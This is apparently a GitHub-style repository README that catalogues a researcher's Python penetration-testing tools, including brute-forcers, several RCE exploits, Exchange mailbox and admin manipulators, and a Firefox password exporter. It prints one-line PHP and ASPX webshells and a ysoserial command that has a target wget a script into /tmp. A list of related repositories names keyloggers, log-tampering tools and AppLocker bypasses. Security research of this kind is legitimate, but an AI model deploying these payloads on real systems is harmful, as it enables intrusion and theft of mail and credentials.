• Stars
    star
    321
  • Rank 130,752 (Top 3 %)
  • Language
    Python
  • Created about 6 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Python codes of my blog.

Homework-of-Python

Python codes of my blog.

pptp_password_hack.py

Use Brute-force attack to get the password of PPTP VPN.

It'll read the passwords in file(named wordlist) and then use pptpsetup to connect to the server.

The time interval is 10 seconds.


portscan.py

Use to scan port.

The timeout is 3 seconds.

c++ version:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Use to get ip from url.

I can use the result of Sublist3r directly.

file_deduplication(For_urltoip).py

Use to remove duplicate ip from the result of Sublist3r.

I can use the result of urltoip.py directly.

The IP can be sorted by using Sublime(F9).


file_deduplication.py

Use to remove duplicate items from file.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Reference:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Used to call fofa's api and print the IP from the results.

You can get 100 results.

fofa_api_VIP.py

Used to call fofa's api and print the IP from the results.

If you're VIP,you'll get 10000 results.


vBulletin_5.x_0day_pre-auth_RCE.py

Reference:

https://seclists.org/fulldisclosure/2019/Sep/31

Eg.

echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Reference:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Eg.

system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Use to export the password of the Firefox

get_Exchange_version.py

Use to get the version of Exchange.

First get the BuildNumber through the souce code of the URL and then get the version.

Reference:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Use to scan the SMBv3 RCE vulnerability.

The timeout is 3 seconds.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Reference:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI..

Affected Products:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Use Zimbra SOAP API to connect the Zimbra mail server.

Usage:

      Zimbra_SOAP_API.py <url> <username> <password> <mode>

mode:

  • low auth for low token
  • admin auth for admin token
  • ssrf Use CVE-2019-9621 to get the admin token

Eg:

      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Use to check the valid account of Exchange Web Service(Support plaintext and ntlmhash)

Reference:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Usage:

checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Eg.

checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Use to access Autodiscover.xml and get the user's configuration(Support plaintext and ntlmhash)

Usage:

checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Eg.

checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Extra mode of checkAutodiscover.py

Add a parameter

ewsManage.py

Use to access Exchange Web Service(Support plaintext and ntlmhash)

Usage:

ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Eg.

ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Use to check the valid credential of SSH(Support password and privatekeyfile)

Usage:

sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Eg.

sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Remote command execution via SSH(Support password and privatekeyfile)

Usage:

sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Eg.

sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Use to check the valid credential of eas(Exchange Server ActiveSync)

Usage:

easCheck.py <host> <user> <password>

Eg.

easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Use to check the valid account of Exchange by connecting to OWA.

Usage:

checkOWA.py <url> <user> <password>

owaManage.py

Use to read mails by connecting to OWA.

Usage:

owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Use IMAP to connect to the mail server.

Usage:

imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Use to implement NTLM authentication and communicate with execCmd.aspx

Communication data is encoded with Base64

Usage:

aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

C sharp Version: SharpExchangeBackdoor.cs

Use to send payload to the Exchange webshell backdoor.

Support:

  • assemblyLoad
  • webshellWrite

Usage:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

eg.

    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

Insecure object deserialization - IMAP

Usage:

<url> <user> <password> <payload path>

Eg.

https://192.168.1.1 [email protected] password1 payload.obj

Note:

You can generate payload.obj like this:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Use to test the deserializing code execution of Exchange.
From read and write permissions of Exchange files to deserializing code execution. You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config to implement deserializing code execution. <path>:owa or ecp

Usage:

    <url> <key> <path>

eg.

 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

Use to parse Exchange SOAP XML message.


eacManage.py

Use to access Exchange admin center

Usage:

eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

Use vSphere Automation API(v7.0U1+) to manage the VM

Support Windows and Linux VM

vSphereWebServicesAPI_Manage.py

Use vSphere Web Services API to manage the VM

Reference: https://github.com/vmware/pyvmomi/

Install: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

Use to manage the LDAP database on vCenter.


SolarWindsOrion_Manage.py

Use to manage the SolarWinds Orion platform

SolarWindsOrionAPI_Manage.py

Use SolarWinds Orion API to manage the Orion platform


MailEnableManage.py

Use to manage the MailEnable mail server


blind_XXEPlatform_CVE-2019-9670.py

It supports receiving results through HTTP or FTP protocol.


ewsManage_Downloader.py

Use to access Exchange Web Service(Support plaintext and ntlmhash)

ewsManage_exchangelib_Downloader.py

Use to access Exchange Web Service(Support plaintext and ntlmhash)

ewsManage_requests_ntlm_Downloader.py

Use requests_ntlm2 to access Exchange Web Service(Support plaintext and ntlmhash)

ewsManage_requests_ntlm_Session_Downloader.py

Use requests_ntlm2 to access Exchange Web Service(Support plaintext and ntlmhash)

Use session to reduce communication data


vCenter_ExtraCertFromMdb.py

Modified from https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

Modified from https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

Use to get the version of Exchange and match the existing vulnerabilities

Exchange_GetVersion_ParseFromFile.py

Use to get the version of Exchange and parse the version from https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

You should save https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 as exchange.data

Exchange_GetVersion_ParseFromWebsite.py

Use to get the version of Exchange and parse the version from https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019


Exchange_GetInternalIP.py

Use to get the internal IP of Exchange

Based on msf auxiliary/scanner/http/owa_iis_internal_ip, but support more Exchange Servers.


vRealizeOperationsManager_GetVersion.py

Use to get the version of vRealize Operations Manager


BIG-IP_RunBash.py

Use bash to run command


SophosUTM_plxDecrypter.py

Use to decrypt the .plx file of Sophos UTM

Reference:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Use to parse the config of Sophos UTM


More Repositories

1

Pentest-and-Development-Tips

A collection of pentest and development tips
1,052
star
2

Homework-of-C-Language

C/C++ code examples of my blog.
C++
334
star
3

Worse-PDF

Turn a normal PDF file into malicious.Use to steal Net-NTLM Hashes from windows machines.
Python
331
star
4

List-RDP-Connections-History

Use powershell to list the RDP Connections History of logged-in users or all users
PowerShell
253
star
5

Eventlogedit-evtx--Evolution

Remove individual lines from Windows XML Event Log (EVTX) files
C++
246
star
6

Javascript-Backdoor

Learn from Casey Smith @subTee
PowerShell
242
star
7

Invoke-BuildAnonymousSMBServer

Use to build an anonymous SMB file server.
PowerShell
219
star
8

msbuild-inline-task

175
star
9

CLR-Injection

Use CLR to inject all the .NET apps
Batchfile
170
star
10

Homework-of-C-Sharp

C Sharp codes of my blog.
C#
169
star
11

pyKerbrute

Use python to perform Kerberos pre-auth bruteforcing
Python
168
star
12

Inject-dll-by-APC

Asynchronous Procedure Calls
C++
163
star
13

SharpRDPCheck

Use to check the valid account of the Remote Desktop Protocol(Support plaintext and ntlmhash)
C#
154
star
14

Inject-dll-by-Process-Doppelganging

Process DoppelgΓ€nging
C
151
star
15

backup-3gstudent.github.io

old blog
SCSS
146
star
16

Smbtouch-Scanner

Automatically scan the inner network to detect whether they are vulnerable.
Python
140
star
17

ntfsDump

Use to copy a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
C++
110
star
18

Homework-of-Powershell

powershell codes of my blog.
PowerShell
93
star
19

Use-COM-objects-to-bypass-UAC

C++
86
star
20

Office-Persistence

Use powershell to test Office-based persistence methods
PowerShell
77
star
21

Windows-User-Clone

Create a hidden account
PowerShell
76
star
22

Windows-EventLog-Bypass

Use subProcessTag Value From TEB to identify Event Log Threads
C++
74
star
23

APT34-Jason

Use to perform Microsoft exchange account brute-force.
C#
74
star
24

pyXSSPlatform

Used to build an XSS platform on the command line.
Python
71
star
25

CVE-2017-8464-EXP

Support x86 and x64
67
star
26

bitsadminexec

Use bitsadmin to maintain persistence and bypass Autoruns
67
star
27

Code-Execution-and-Process-Injection

Powershell to CodeExecution and ProcessInjection
PowerShell
64
star
28

Shellcode-Generater

No inline asm,support x86/x64
C++
63
star
29

test

just test
C#
63
star
30

CreateRemoteThread

From 32-bit process to 64-bit process
C++
62
star
31

PasswordFilter

2 ways of Password Filter DLL to record the plaintext password
C++
61
star
32

Dump-Clear-Password-after-KB2871997-installed

PowerShell
59
star
33

From-System-authority-to-Medium-authority

Penetration test
C++
57
star
34

Waitfor-Persistence

Use Waitfor.exe to maintain persistence
PowerShell
54
star
35

Bypass-Windows-AppLocker

C
54
star
36

NinjaCopy

Powershell to copy ntds.dit
PowerShell
54
star
37

COM-Object-hijacking

use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)
PowerShell
54
star
38

3gstudent.github.io

Blog
SCSS
54
star
39

Winpcap_Install

Auto install WinPcap on Windows(command line)
Batchfile
52
star
40

ewsManage

My exercise of using Exchange Web Service(EWS)
C#
51
star
41

HiddenNtRegistry

Use NT Native Registry API to create a registry that normal user can not query.
C++
49
star
42

Homework-of-Go

Go code examples of my blog.
Go
49
star
43

signtools

From Windows SDK
47
star
44

Eventlogedit-evt--General

Remove individual lines from Windows Event Viewer Log (EVT) files
C++
44
star
45

PNG-Steganography

Steganography Payload
C++
44
star
46

easBrowseSharefile

Use to browse the share file by eas(Exchange Server ActiveSync)
Python
43
star
47

Bypass-McAfee-Application-Control--Code-Execution

source&exe
PowerShell
38
star
48

Smallp0wnedShell

Small modification version of p0wnedShell
C#
37
star
49

ListInstalledPrograms

List the programs that the current Windows system has installed
PowerShell
36
star
50

AutoIt-Keylogger

AutoIt
33
star
51

Hide-Process-by-kd.exe

powershell to hide process by kd.exe
PowerShell
33
star
52

NodeJS-Downloader

An example of a downloader written in NodeJS.
JavaScript
26
star
53

Use-msxsl-to-bypass-AppLocker

Learn from Casey Smith@subTee
XSLT
26
star
54

GetExpiredDomains

Search for available domain from expireddomains.net
Python
24
star
55

ExcelDllLoader

Execute DLL via the Excel.Application object's RegisterXLL() method
JavaScript
22
star
56

Add-Dll-Exports

Use to generate DLL through Visual Studio
C
19
star
57

Execute-CSharp-From-XSLT-TEST

XSLT
18
star
58

Writeup

interesting analysis
PowerShell
15
star
59

PNG_stego-test

LSB-test
C
12
star
60

SendMail-with-Attachments

Use powershell to send mail
PowerShell
11
star
61

Catch-specified-file-s-handle

Enumerate all processes and get specified file's handle,then close it.
C++
10
star
62

pdf

9
star
63

IE-BHO-POSTdata-Logger

A sample IE BHO for logging Internet Explorer's POST data.
C++
9
star
64

WanaCrypt0r-Reverse-Analysis

Record my reverse analysis of WanaCrypt0r
8
star
65

bgi-creater

Use BGInfo to bypass Application Whitelisting
PowerShell
7
star
66

Get-Wlan-Keys

Powershell to get wlan keys
PowerShell
7
star
67

Homework-of-Java

Java codes of my blog
Java
5
star
68

3gstudent

5
star
69

regsvr32-test

C++
4
star
70

Test-Exploit-for-Joomla-3.4.4-3.6.4

Test if the website allows user registration
Python
3
star
71

BlogPic

For blog post
2
star